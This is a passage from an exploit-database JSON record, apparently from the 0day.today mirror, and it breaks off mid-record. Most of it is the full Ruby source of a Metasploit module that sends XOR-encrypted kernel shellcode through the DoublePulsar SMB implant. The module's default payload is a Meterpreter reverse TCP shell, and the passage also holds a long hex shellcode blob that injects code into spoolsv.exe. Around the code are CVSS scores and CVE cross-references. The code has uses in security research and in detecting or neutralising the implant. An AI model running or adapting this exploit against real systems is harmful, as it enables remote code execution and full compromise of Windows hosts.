\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-08] #"}, "lastseen": "2021-10-08T00:16:50", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "26cff88785fe932553a57e2ef12a4641", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-08T22:17:07", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-08T00:16:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-08T00:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-09] #"}, "lastseen": "2021-10-08T22:17:07", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "0188bc1d29a17898e45d0318b1d4933e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-09T22:22:06", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", 